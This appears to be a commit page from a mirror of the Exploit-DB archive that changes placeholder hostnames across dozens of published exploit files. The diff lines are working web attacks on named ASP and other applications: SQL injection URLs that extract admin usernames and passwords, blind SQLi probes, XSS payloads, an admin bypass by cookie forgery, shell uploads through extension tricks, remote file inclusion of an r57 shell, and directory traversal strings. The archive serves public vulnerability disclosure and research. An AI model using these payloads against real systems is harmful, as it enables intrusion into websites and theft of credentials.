bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

DB: 2016-09-03

Browse source
This commit is contained in:
Offensive Security 2016-09-03 13:13:25 +00:00
parent 31a21bb68d
commit 5e2fc10125
8946 changed files with 11253 additions and 11105 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
platforms/aix/dos/15264.py
View file

@ -74,7 +74,7 @@ if len(sys.argv) < 3:
print " "
print ' usage: %s http://server/path/ day-mounth-year' % os.path.basename(sys.argv[0])
print ' usage: %s http://server.com/path/ day-mounth-year' % os.path.basename(sys.argv[0])
print " "
@ -88,7 +88,7 @@ if len(sys.argv) < 3:
print "_______________________________________________________________"
sys.exit("\nexample: http://server/ 16-10-2010")
sys.exit("\nexample: http://www.server.com/ 16-10-2010")

6
platforms/aix/dos/35342.txt
View file

@ -14,15 +14,15 @@ and no any filter for html code at robots.lib.php. you can inject your html code
html inj.:
server/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
target.com/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
after you go here:
server/robotstats/info-robot.php?robot=(robot id)
target.com/robotstats/info-robot.php?robot=(robot id)
or
server/robotstats/admin/robots.php you will see your html page
target.com/robotstats/admin/robots.php you will see your html page
analysis: (/admin/robots.php)

6
platforms/aix/webapps/14058.html
View file

@ -12,7 +12,7 @@
[~] 1.Save code html format
[~] 2.Search server
[~] 2.Search Target.com
[~] 3.Edit and replace & Target
@ -26,7 +26,7 @@
[~] 8.Formats can be uploaded (Html.Htm.Jpg.gif.Xml....)
[~] 9.server/images/uploads/File/File Name
[~] 9.Target.com/images/uploads/File/File Name
[~]######################################### ExploiT
#############################################[~]
@ -62,7 +62,7 @@ Connector:<br />
<option value="lasso/connector.lasso">Lasso</option>
<option value="perl/connector.cgi">Perl</option>
<option value="
http://server/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
">PHP</option>
<option value="py/connector.py">Python</option>
</select>

2
platforms/asp/webapps/1010.pl
View file

@ -30,7 +30,7 @@ if (@ARGV < 2)
print " 2 ==> Version 1.36, 2.0 and Next\n";
print "==========================================\n\n";
print "Example:\n\n";
print " Max.pl www.server 1\n";
print " Max.pl www.Site.com 1\n";
exit();
}
$hell = "foo' or M_Name='admin";

2
platforms/asp/webapps/1011.php
View file

@ -7,7 +7,7 @@ Alphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam
----------------Discovered by: s d <irsdl@yahoo.com>------------------------------------------
*/
# Config ________________________________
# address - example: http://www.server/password.asp
# address - example: http://www.site.com/password.asp
$url = "http://www.mohamad.com/password.asp";
$mh = "s1";
# if webmaxportal version is : Version 1.35 and older please input $mh= "s1"

2
platforms/asp/webapps/10501.txt
View file

@ -15,7 +15,7 @@
[*] Err0r C0N50L3:
[*] server/player.asp?player_id={EV!L BL!ND INJ}
[*] www.target.com/player.asp?player_id={EV!L BL!ND INJ}
[*] EV!L BL!ND

2
platforms/asp/webapps/10503.txt
View file

@ -15,7 +15,7 @@
[*] Err0r C0N50L3:
[*] server/[path]/admin/edit.asp?ID={EV!L blind sql}
[*] www.target.com/[path]/admin/edit.asp?ID={EV!L blind sql}
[*] EV!L BL!ND sql

2
platforms/asp/webapps/10504.txt
View file

@ -15,7 +15,7 @@
[*] Err0r C0N50L3:
[*] server/[path]/campaignEdit.asp?CCam={EV!L blind sql}
[*] www.target.com/[path]/campaignEdit.asp?CCam={EV!L blind sql}
[*] EV!L BL!ND sql

2
platforms/asp/webapps/1070.pl
View file

@ -24,7 +24,7 @@ if (@ARGV < 1)
print " Usage:ASPNuke.pl <T4rg3t> \n\n";
print "==========================================\n\n";
print "Examples:\n\n";
print " ASPNuke.pl www.server \n";
print " ASPNuke.pl www.Site.com \n";
exit();
}

2
platforms/asp/webapps/10955.txt
View file

@ -26,7 +26,7 @@
[ª]dem0:
http://www.server/?page=details&newsID=1905+union+select+1,pword,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users
http://www.site.com/?page=details&newsID=1905+union+select+1,pword,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users
Admin:[Path]/admin/login.asp

2
platforms/asp/webapps/11212.txt
View file

@ -8,5 +8,5 @@
# Risk: Medium
#################################################################
# Vulnerability:
# http://server/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
# http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
#################################################################

12
platforms/asp/webapps/11295.txt
View file

@ -8,7 +8,7 @@ Vulnerability:
=======================
Arbitrary File Upload
=======================
<form action = "http://server/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">
<form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">
<p align="center">
<input type=file name=uploadfile size=100><br> <br>
<input type=submit value=Upload>  </p>
@ -18,19 +18,19 @@ Arbitrary File Upload
=======================
Arbitrary File Upload 2
=======================
http://server/admin/ewebeditor/ewebeditor.htm?id=body&style=popup
http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup
=======================
Database Disclosure
=======================
http://server/ewebeditor/db/ewebeditor.mdb
http://site.com/ewebeditor/db/ewebeditor.mdb
=======================
Administrator bypass
=======================
http://server/eWebEditor/admin/login.asp
http://site.com/eWebEditor/admin/login.asp
put this code instead URL
javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));
@ -39,11 +39,11 @@ javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));
=======================
Directory Traversal
=======================
http://server/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..
http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..
=======================
Directory Traversal 2
=======================
http://server/ewebeditor/asp/browse.asp?style=standard650&dir=./..
http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./..

2
platforms/asp/webapps/13788.txt
View file

@ -22,7 +22,7 @@ Xploit: SQLi Vulnerability
DEMO URL:
http://server/new_reply_form.asp?TID=[SQLi]
http://site.com/new_reply_form.asp?TID=[SQLi]
###############################################################################################################

2
platforms/asp/webapps/13790.txt
View file

@ -22,7 +22,7 @@ Xploit: SQLi Vulnerability
DEMO URL:
http://server/reallusiontv/ic/productdemo.asp?page=[SQLi]
http://site.com/reallusiontv/ic/productdemo.asp?page=[SQLi]
###############################################################################################################

2
platforms/asp/webapps/13793.txt
View file

@ -42,7 +42,7 @@ Admin Control:
Usename:admin
Password:admin
DEMO URL :http://server/onlinenotebookmanager.asp?ItemID=[SQLi]
DEMO URL :http://site.com/onlinenotebookmanager.asp?ItemID=[SQLi]
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

2
platforms/asp/webapps/13880.txt
View file

@ -18,7 +18,7 @@
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=1
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Smart ASP Survey SQL & XSS Vulnerable
Vendor url:http://www.sellatserver
Vendor url:http://www.sellatsite.com
Version:n/a
Published: 2010-06-15
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to

2
platforms/asp/webapps/13882.txt
View file

@ -19,7 +19,7 @@
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:SAS Hotel Management System SQL Vulnerable
Vendor url:http://www.sellatserver
Vendor url:http://www.sellatsite.com
Version:n/a
Price:28$
Published: 2010-06-15

8
platforms/asp/webapps/14030.pl
View file

@ -17,9 +17,9 @@
---
http://www.server/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
http://www.server/sablonlar/gunaysoft/gunaysoft.php?sayfaid=[shell]
http://www.server/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?sayfaid=[shell]
http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
---
@ -100,7 +100,7 @@ print q
Usage:
perl phportal.pl <Target website> <Shell Location> <CMD Variable> <-r> <-p>
<Target Website> - Path to target eg: www.victim.com
<Shell Location> - Path to shell eg: http://server/r57.txt?
<Shell Location> - Path to shell eg: http://site.com/r57.txt?
<CMD Variable> - Shell command variable name eg: Pwd
<r> - Show output from shell
<p> - sablonlar/gunaysoft/gunaysoft.php

2
platforms/asp/webapps/1419.pl
View file

@ -12,7 +12,7 @@ if (@ARGV < 3)
print q(
+++++++++++++++++++++++++++++++++++++++++++++++++++
Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)]
i.e. perl mini-nuke.pl "someserver" / 52 127.0.0.1:3128
i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++++
);
exit;

4
platforms/asp/webapps/14284.txt
View file

@ -27,11 +27,11 @@ i-Gallery is a complete online photo gallery. Easy to navigate thumbnails with p
#######################################################################################################
Xploit :Arbitrary File Include Vulnerabilty
DEMO URL http://www.server/igallery34/viewphoto.asp?i=[file include]&f=fghd&sh=27768&sw=1024
DEMO URL http://www.site.com/igallery34/viewphoto.asp?i=[file include]&f=fghd&sh=27768&sw=1024
Xploit :Persistent XSS Vulnerabilty
DEMO URL http://www.server/igallery34/submitphotos.asp?mi=1
DEMO URL http://www.site.com/igallery34/submitphotos.asp?mi=1

4
platforms/asp/webapps/14419.txt
View file

@ -11,11 +11,11 @@ Dork : inurl:hikaye.asp?id=
===================================================
[+] Vulnerable File : http://www.server/hikaye.asp?id=123
[+] Vulnerable File : http://www.site.com/hikaye.asp?id=123
===================================================
[+] Demo : http://www.server/hikaye.asp?id=17'a
[+] Demo : http://www.site.com/hikaye.asp?id=17'a
===================================================

4
platforms/asp/webapps/14420.txt
View file

@ -11,11 +11,11 @@ Dork : inurl:makaledetay.asp?id=
===================================================
[+] Vulnerable File : http://www.server/makaledetay.asp?id=123
[+] Vulnerable File : http://www.site.com/makaledetay.asp?id=123
===================================================
[+] Demo : http://www.server/makaledetay.asp?id=15%27a
[+] Demo : http://www.site.com/makaledetay.asp?id=15%27a
===================================================

4
platforms/asp/webapps/14461.txt
View file

@ -13,14 +13,14 @@ Dork : :/ sorry
[+] Vulnerable File :
http://www.server/default.asp?islem=devami&id=38%20union+select+all+0,
http://www.site.com/default.asp?islem=devami&id=38%20union+select+all+0,
sifre,2,3%20,4,5+from+aky_ayarlar
===================================================
[+] Demo :
http://www.server/blog/default.asp?islem=devami&id=38%20union+s
http://www.site.com/blog/default.asp?islem=devami&id=38%20union+s
elect+all+0,sifre,2,3%20,4,5+from+aky_ayarlar
===================================================

2
platforms/asp/webapps/14709.txt
View file

@ -15,7 +15,7 @@
# Version: netStartEnterprise v4.0
# Path: http://www.server/previeweventdetail.aspx?id=[SQL]
# Path: http://www.site.com/previeweventdetail.aspx?id=[SQL]
# Platform: ASP

2
platforms/asp/webapps/1472.pl
View file

@ -84,7 +84,7 @@ sub usage()
{
head();
print " Usage: Thaisql.pl <Site> \r\n\n";
print " <Site> - Full path to Guestbook e.g. http://www.server/guestbook/ \r\n";
print " <Site> - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n";
print "=======================================================================\r\n";
print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n";
print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";

2
platforms/asp/webapps/14821.txt
View file

@ -11,7 +11,7 @@ Vulnerability : (Auth Bypass) SQL Injection Vulnerability
[Auth Bypass]:
user: pouya
pass: ' or '
admin page : http://server/[path]/admin.asp
admin page : http://site.com/[path]/admin.asp
---------------------------------
Victem :
http://www.etoshop.com/demo/pcstore

1
platforms/asp/webapps/14898.txt
View file

@ -123,3 +123,4 @@ Persistent XSS Vulnerabilities:
===========================================================================================

4
platforms/asp/webapps/14913.txt
View file

@ -43,7 +43,7 @@ Step 1) Login into member or User Section
Link:
http://www.server/dmxreadyv2/membersareamanager/membersareamanager.asp?show=login-member
http://www.site.com/dmxreadyv2/membersareamanager/membersareamanager.asp?show=login-member
Step 2) Go to Edit profile
@ -66,7 +66,7 @@ Step 3) Enter your Attack Pattern
Step 4) Refresh and View User profile
Demo Url:-
http://www.server/dmxreadyv2/membersareamanager/membersareamanager.asp?member=&show=member-profile&tab=meta
http://www.site.com/dmxreadyv2/membersareamanager/membersareamanager.asp?member=&show=member-profile&tab=meta
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~

2
platforms/asp/webapps/14914.txt
View file

@ -38,7 +38,7 @@ Vulnerability:
DEMO URL:
http://www.server/detail.asp?ad_ID=1&vehicletypeID=[sqli]
http://www.site.com/detail.asp?ad_ID=1&vehicletypeID=[sqli]
# 0day n0 m0re #

6
platforms/asp/webapps/14943.txt
View file

@ -45,7 +45,7 @@ if id<>"" then
lots of files those will have to do input validation from user input are vulnerable to SQL Injection .
PoC :
www.server/main_fa.asp?status=news&newsID=23'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/dc_admin/*
www.site.com/main_fa.asp?status=news&newsID=23'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/dc_admin/*
note : if you can't see result you need to do it blindly
@ -53,7 +53,7 @@ note : if you can't see result you need to do it blindly
2- Bypass uploads restriction:
after you got user/pass with sql injection go to
http://server/admin/dc_upload.asp
http://site.com/admin/dc_upload.asp
js file line 13-34 :
@ -82,4 +82,4 @@ function showthumb(file) {
as you can see the uploader will check malicious extention by javascript . just disable javascript and you can upload "ASP" shell.
you can find your shell in : www.server/0_site_com/[rnd-number].asp (the application itself will show you right rnd number after upload)
you can find your shell in : www.site.com/0_site_com/[rnd-number].asp (the application itself will show you right rnd number after upload)

1
platforms/asp/webapps/14954.txt
View file

@ -65,3 +65,4 @@ PoC:
Note that : the value 2010_7_25 is the exact date of server.
===========================================================================================

8
platforms/asp/webapps/14969.txt
View file

@ -46,14 +46,14 @@ Description :
Considering to the code, you can browse these URLs:
http://www.server/module/article/article/article.asp?articleid=7' (the false Query will be shown)
http://www.server/module/article/article/article.asp?articleid=7+and+'a'='a'-- (this Query is always true)
http://www.site.com/module/article/article/article.asp?articleid=7' (the false Query will be shown)
http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'='a'-- (this Query is always true)
with the following URL you can find the first character of Username:
http://www.server/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,1,1)+from+tblUser)--
http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,1,1)+from+tblUser)--
and second character:
http://www.server/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,2,1)+from+tblUser)--
http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,2,1)+from+tblUser)--
and so on.

1
platforms/asp/webapps/15058.html
View file

@ -83,3 +83,4 @@ This page remove Admins Role in VWD-CMS.
===========================================================================================

1
platforms/asp/webapps/15067.txt
View file

@ -179,3 +179,4 @@ Persistent XSS and XSRF:
===========================================================================================

1
platforms/asp/webapps/15078.txt
View file

@ -183,3 +183,4 @@ This page uploads a file
===========================================================================================

1
platforms/asp/webapps/15106.txt
View file

@ -61,3 +61,4 @@ Persistent XSS in admin section:
===========================================================================================

4
platforms/asp/webapps/15118.txt
View file

@ -9,7 +9,7 @@ Gokhun ASP Stok v1.0 - Multiple Remote Vulnerabilities
~Script : Gokhun ASP Stok v1.0
~Software: http://www.gokhun.com & http://www.aspindir.com/goster/6092
~Vulnerability Style : Multiple vulnerabilities
~Demo : http://www.server/asp/pages/main/
~Demo : http://www.site.com/asp/pages/main/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~
======== SQL Injection =========
@ -51,7 +51,7 @@ print "[-]Ornegi inceleyin\n\n";
}
sub help()
{
print "[+] usage1 : perl $0 server /path/ \n";
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

1
platforms/asp/webapps/15160.txt
View file

@ -160,3 +160,4 @@ This page uploads a file with "xml" extension
</html>
===========================================================================================

2
platforms/asp/webapps/15183.py
View file

@ -40,7 +40,7 @@ if len(sys.argv) < 2:
print " "
print " coded by ZoRLu "
print " "
print ' usage: %s http://server/path/' % os.path.basename(sys.argv[0])
print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
print " "
print "_______________________________________________________________"
sys.exit(1)

2
platforms/asp/webapps/15199.py
View file

@ -38,7 +38,7 @@ if len(sys.argv) < 2:
print " "
print " coded by ZoRLu "
print " "
print ' usage: %s http://server/path/' % os.path.basename(sys.argv[0])
print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
print " "
print "_______________________________________________________________"
sys.exit(1)

2
platforms/asp/webapps/15219.py
View file

@ -29,7 +29,7 @@ if len(sys.argv) < 2:
print " "
print " Usage: "
print " "
print " python exploit.py http://server/path/ "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)

2
platforms/asp/webapps/15270.txt
View file

@ -49,7 +49,7 @@ print "[-]Ornegi inceleyin\n\n";
}
sub help()
{
print "[+] usage1 : perl $0 server /path/ \n";
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

10
platforms/asp/webapps/15382.txt
View file

@ -29,7 +29,7 @@ private void Page_Load(object sender, EventArgs e)
}
[-] End Poc
[#] Exploit :
http://server/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script>
http://Site.Com/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script>
[2] Remote File Upload :
@ -41,14 +41,14 @@ string acceptedFiles =
";.jpg;.jpeg;.jpe;.gif;.bmp;.png;.swf;.avi;.ra;.mov;.mpeg;.mpg;.wav;";
You Can Bypass
[-] End Poc
[#] Exploit :http://server/DesktopModules/ftb/ftb.imagegallery.aspx[*]
[#] Exploit :http://Site.Com/DesktopModules/ftb/ftb.imagegallery.aspx[*]
[3] Information Leakage Show Device Info :
http://server/security/DeviceInfo.aspx
http://Site.Com/security/DeviceInfo.aspx
[4] Xss Present :
http://server/security/DeviceInfo.aspx
http://Site.Com/security/DeviceInfo.aspx
[~] Poc :
Douran.dll:DouranPortal.DesktopModules.BlogDB
Submit Data Without Check{
@ -104,7 +104,7 @@ SqlDbType.NVarChar, 100);
command.ExecuteNonQuery();
sqlConnectionString.Close();}
[-] End Poc
[#] Exploit :http://server/DesktopModules/Blog/BlogView.aspx
[#] Exploit :http://Site.Com/DesktopModules/Blog/BlogView.aspx
[-][-][-][-][-][-][-](Vulnerabilities)[-][-][-][-][-][-][-]
~~~~~~~~~~~~~~~~[Vulnerabilities]~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2
platforms/asp/webapps/15544.txt
View file

@ -25,7 +25,7 @@ NewsPad Database Download Vulnerability
############################################################
exploit # server/path/database/NewsPad.mdb
exploit # www.target.com/path/database/NewsPad.mdb
############################################################

6
platforms/asp/webapps/15563.txt
View file

@ -17,13 +17,13 @@ Sitefinity CMS (ASP.NET) Shell Upload Vulnerability
exploit # /UserControls/Dialogs/ImageEditorDialog.aspx
first go to # http://server/sitefinity/
first go to # http://site.com/sitefinity/
then # http://server/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
select # asp renamed via the .asp;.jpg (shell.asp;.jpg)
Upload to # http://server/Images/[shell]
Upload to # http://site.com/Images/[shell]
Video : http://net-edit0r.persiangig.com/Film/0day.rar

2
platforms/asp/webapps/1569.pl
View file

@ -15,7 +15,7 @@ print "\r\n=-=-=-===============================================================
if (@ARGV != 2)
{
print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n";
print " ex: kapda_D2KBLOG_xpl.pl server /blog/profile.asp\n\r\n";
print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
exit ();
}

1
platforms/asp/webapps/15703.txt
View file

@ -36,3 +36,4 @@ Personal
# Special Thanks : Farzad_Ho,R3dMind,rAbiN_hoOd,Falcon

2
platforms/asp/webapps/15776.pl
View file

@ -8,7 +8,7 @@
# Found: Br0ly
# google dork: inurl:"produtos.asp?produto="
# Use some base64 decode google IT.
# After decoding login and pass go to: www.server.br/administrador.asp
# After decoding login and pass go to: www.site.com.br/administrador.asp
# aoiuaoaaaaiuahiuahaaiauhaiuha EASY ???
# BRASIL!! :D
#

8
platforms/asp/webapps/16205.txt
View file

@ -6,11 +6,11 @@ dork : intext:"powered by DiyWeb"
SQL - Microsoft JET Database Engine error
-----------------------------------------
http://server/template.asp?menuid=[SQL]
http://server/viewcatalog.asp?id=[SQL]
http://server/xxx.asp?id=[SQL]
http://site.com/template.asp?menuid=[SQL]
http://site.com/viewcatalog.asp?id=[SQL]
http://site.com/xxx.asp?id=[SQL]
XSS
---
http://server/diyweb/login.asp?msg=[XSS] -- login page
http://site.com/diyweb/login.asp?msg=[XSS] -- login page

12
platforms/asp/webapps/16241.txt
View file

@ -8,21 +8,21 @@ Blind SQL
POC
---
http://server//gallery_details.asp?a_id=12' and '1'='1 TRUE
http://server//gallery_details.asp?a_id=12' and '0'='1 FALSE
http://site.com//gallery_details.asp?a_id=12' and '1'='1 TRUE
http://site.com//gallery_details.asp?a_id=12' and '0'='1 FALSE
2 - Parameter news.asp?intSeq=[Blind SQL]
POC
---
http://www.server/news/news.asp?intSeq=69' and '1'='1 TRUE
http://www.server/news/news.asp?intSeq=69' and '0'='1 FALSE
http://www.site.com/news/news.asp?intSeq=69' and '1'='1 TRUE
http://www.site.com/news/news.asp?intSeq=69' and '0'='1 FALSE
3 - Parameter news.asp?id=[Blind SQL]
POC
---
http://www.server/news/news.asp?id=256 and 1=1 TRUE
http://www.server/news/news.asp?id=256 and 1=0 FALSE
http://www.site.com/news/news.asp?id=256 and 1=1 TRUE
http://www.site.com/news/news.asp?id=256 and 1=0 FALSE

6
platforms/asp/webapps/16941.txt
View file

@ -8,13 +8,13 @@ SQL - Microsoft JET Database Engine error
------------------------------------------
view_article.asp?item=[SQL]
http://server/page.asp?pID=[SQL]
http://server/display.asp?sortby=sections&sID=[SQL]
http://site.com/page.asp?pID=[SQL]
http://site.com/display.asp?sortby=sections&sID=[SQL]
POC
---
http://server/view_article.asp?item=1 union select 1 from test.a
http://site.com/view_article.asp?item=1 union select 1 from test.a
thanks,
-p0pc0rn-

8
platforms/asp/webapps/16953.txt
View file

@ -5,10 +5,10 @@ Found by: p0pc0rn
SQL
---
http://server/page.asp?id=[SQL]
http://server/cat.asp?catid=[SQL]
http://server/catin.asp?productid=[SQL]
http://site.com/page.asp?id=[SQL]
http://site.com/cat.asp?catid=[SQL]
http://site.com/catin.asp?productid=[SQL]
POC
---
http://server/page.asp?id=23 union select 1 from test.a
http://site.com/page.asp?id=23 union select 1 from test.a

2
platforms/asp/webapps/17015.txt
View file

@ -6,7 +6,7 @@
# Software: Element-IT PowUpload 1.3
# Software Link: http://www.element-it.com/downloadfile.aspx?type=pow
# Demo:
http://server/Examples/PowUpload/Simpleupload.htm
http://site.com/Examples/PowUpload/Simpleupload.htm
 
[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,

2
platforms/asp/webapps/17016.txt
View file

@ -5,7 +5,7 @@
# Author Web: www.delincuentedigital.com.ar
# Software: EAFlashUpload v 2.5
# Software Link: http://www.easyalgo.com/downloads.aspx#EAFlashUpload
# Demo: http://www.server/examples/eaflashupload/simpleupload.aspx
# Demo: http://www.site.com/examples/eaflashupload/simpleupload.aspx
 
[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,

8
platforms/asp/webapps/17036.txt
View file

@ -28,10 +28,10 @@
#
#
#
# [+]http://server/default.asp?pid=524'
# [+]http://server/default.asp?pid=[SQLi]
# [+]http://server/viewproduct.asp?PID=130'
# [+]http://server/viewproduct.asp?PID=[SQli]
# [+]http://site.com/default.asp?pid=524'
# [+]http://site.com/default.asp?pid=[SQLi]
# [+]http://site.com/viewproduct.asp?PID=130'
# [+]http://site.com/viewproduct.asp?PID=[SQli]
#
#
# => PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam

2
platforms/asp/webapps/1714.txt
View file

@ -6,7 +6,7 @@
First you must be logged in
Then type this in your browser
http://www.server/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
You will find admin's password

2
platforms/asp/webapps/17228.txt
View file

@ -12,7 +12,7 @@ Exploit Details :
2- Browse This Link : /forum/pm_show_message.asp?ID= "it's a message on Your Inbox"
3- Poc: www.server//forum/pm_show_message.asp?ID=(inject here)
3- Poc: www.site.com//forum/pm_show_message.asp?ID=(inject here)
----------------------------------------------------------------
****** SSMM T34M ******

4
platforms/asp/webapps/1807.txt
View file

@ -11,8 +11,8 @@ Successful exploitation extracts username and password of administrator in clear
Proof of Concepts:
--------------------
server/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
server/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'
-------

4
platforms/asp/webapps/21272.txt
View file

@ -236,8 +236,8 @@ $hello='
Website : www.kami.ma
Usage> php knowledgebase0day.php host
Exemple> php knowledgebase0day.php kbase.server
Exemple> php knowledgebase0day.php kbase.server /foo
Exemple> php knowledgebase0day.php kbase.target.com
Exemple> php knowledgebase0day.php kbase.target.com /foo
';

2
platforms/asp/webapps/21455.txt
View file

@ -5,4 +5,4 @@ Hosting Controller is an application which consolidates all hosting tasks into o
The DSNManager script does not sufficiently filter dot-dot-slash (../) sequences from URL parameters, making it prone to directory traversal attacks. An attacker can exploit this condition to disclose the contents of arbitrary web-readable files or potentially add a DSN (Data Source Number) to an arbitrary directory.
http://target/admin/dsn/dsnmanager.asp?DSNAction=ChangeRoot&RootName=D:\webspace\opendnsserver\targ
et\server\db\..\..\..\..\
et\target.com\db\..\..\..\..\

4
platforms/asp/webapps/2228.txt
View file

@ -17,11 +17,11 @@
################################################################################
############################################################################################################################################################
#Usage : http://server/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #
############################################################################################################################################################
###########################################################
#Admin Panel : http://server/path/admin/login.asp #
